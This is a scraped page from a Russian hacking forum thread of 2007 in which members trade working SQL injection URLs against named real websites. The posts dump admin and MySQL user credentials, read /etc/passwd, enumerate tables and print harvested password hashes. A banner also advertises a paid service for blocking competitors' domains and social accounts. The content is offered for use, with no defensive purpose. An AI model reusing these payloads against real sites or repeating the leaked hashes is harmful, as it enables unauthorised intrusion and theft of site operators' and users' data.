Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 164 из 1242

164

Опции темы

Поиск в этой теме

Опции просмотра

#1631

04.04.2007, 21:27

Fr-Ron

Участник форума

Регистрация: 10.09.2006

Сообщений: 185

Провел на форуме:
1654589

Репутация: 337

LOAD_FILE('etc/passwd') проходит, но выдает путой результат ^_____^
На загрузку файлов не проверял.
На ошибки внимания не обращаем, имена файлов берутся из базы, поэтому ругает за отсутсвие.

Цитата:

http://www.produktonline.ru/list.php?link=2166+union+select+1,2,3,4,version(), 6,7,8,9,10,11,12,13,14,15,16,17,18,LOAD_FILE(0x2f6 574632f706173737764),20,21,22,23,24,25,26,27

#1632

04.04.2007, 21:47

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

Код:

http://www.di-do.ru/index.php?all=1&c1=-1+union+select+1,concat(email,0x3a,pass),3,4+from+clients/*

#1633

04.04.2007, 21:57

~~zl0ba~~

Banned

Регистрация: 10.10.2006

Сообщений: 596

Провел на форуме:
2132613

Репутация: 1365

compoundsemi.com

Код:

http://compoundsemi.com/documents/view/generic.php?id=-6913/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(name,0x3a,password),18+from+admin+limit+2,1/*

C пасами жопа =\

#1634

04.04.2007, 22:30

maxster

Участник форума

Регистрация: 27.10.2006

Сообщений: 205

Провел на форуме:
2298631

Репутация: 380

Отправить сообщение для maxster с помощью ICQ

Можно книжек заказать =)

Код:

http://petropol.com/browse/fetch.php3?id=-104544+union+select+1,2,3,LOAD_FILE(0x2f6574632f706173737764),5,6,7,8,9,10,11,12,13,14,15,16,17,19,20,21,22,23,24,25,26,27,28,29,30,31/*&type=book

#1635

04.04.2007, 22:45

random

Познающий

Регистрация: 05.09.2006

Сообщений: 50

Провел на форуме:
1988972

Репутация: 250

Код:

http://oz.com.ru/st.php?id=218+union+select+concat(database(),0x3a,version()),2,3,4,5/*

Код:

http://gapart.com/ru/he/work.php?catid=1&page=1&id=-4+union+select+1,2,version(),4,5,6/*

#1636

04.04.2007, 22:53

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

akusherstvo.ru

Код:

http://www.akusherstvo.ru/magaz.php?action=cat_show&ordby=type&type_active=-1+union+select+concat(user,0x3a,password),2+from+mysql.user/*

root:5d1a051535bd4dcd

также чем-то могут быть интересны таблицы admin, myuser, phpbb_users, a_admin
пример скули форум:

Код:

http://www.akusherstvo.ru/magaz.php?action=cat_show&ordby=type&type_active=-1+union+select+concat(username,0x3a,user_password),2+from+phpbb_users+limit+2,1/*

Администратор:3693dc9bc65e54f85826ddc a773dbd5b
8.5k users
в общем-то, там еще 150 таблиц, есть простор для мозгового штурма)

#1637

04.04.2007, 22:54

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Может и было...

Код:

http://www.cybertown.ru/catalog.php?action=site&id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
http://www.cybertown.ru/catalog.php?action=site&id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+limit+16,1/*
http://www.cybertown.ru/catalog.php?action=site&id=-1+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=char(97,99,99,111,117,110,116,115)+limit+0,1/*
http://www.cybertown.ru/catalog.php?action=site&id=-1+union+select+1,2,3,concat(ID,char(58),LOGIN,char(58),PASS,char(58),FIO,char(58),EMAIL),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+accounts+limit+0,1/*

Код:

http://www.divanodrom.ru/textile.php?id=-1+union+select+convert(concat(database(),char(58),user(),char(58),version()),char)/*

#1638

04.04.2007, 23:00

~~zl0ba~~

Banned

Регистрация: 10.10.2006

Сообщений: 596

Провел на форуме:
2132613

Репутация: 1365

http://www.fmodels.net - я хекнул много блондинок, теперь они все мои =)

Код:

http://www.fmodels.net/news.php3?id=-10+union+select+1,concat(user,0x3a,password),3,4,5,6,7+from+mysql.user+limit+1,3/*

Надо с лимитом играться =\

Код:

http://redcame.org.ar/news.php3?id=-550+union+select+1,2,3/*

#1639

04.04.2007, 23:16

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

2 zl0ba:
зачем лимит?
сразу весь список

Код:

http://www.fmodels.net/news.php3?id=-10+union+select+1,2,concat(user,0x3a,password),4,5,6,7+from+mysql.user/*

а по твоему линку вообще вывода не увидел, мб глюки..

#1640

04.04.2007, 23:53

Fr-Ron

Участник форума

Регистрация: 10.09.2006

Сообщений: 185

Провел на форуме:
1654589

Репутация: 337

Ну и еще один интернет - магазин...

Цитата:

http://www.bestwatch.ru/podves.phtml?idb=52600+union+select+1,2,3,4,5,conc at(user,0x3a,password),7,8,9,10,11,12+from+mysql.u ser/*

root:7c09cac038aef27b

Админку не нашел, в robots.txt тоже не прописано =\

Страница 164 из 1242

164

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)

Быстрый переход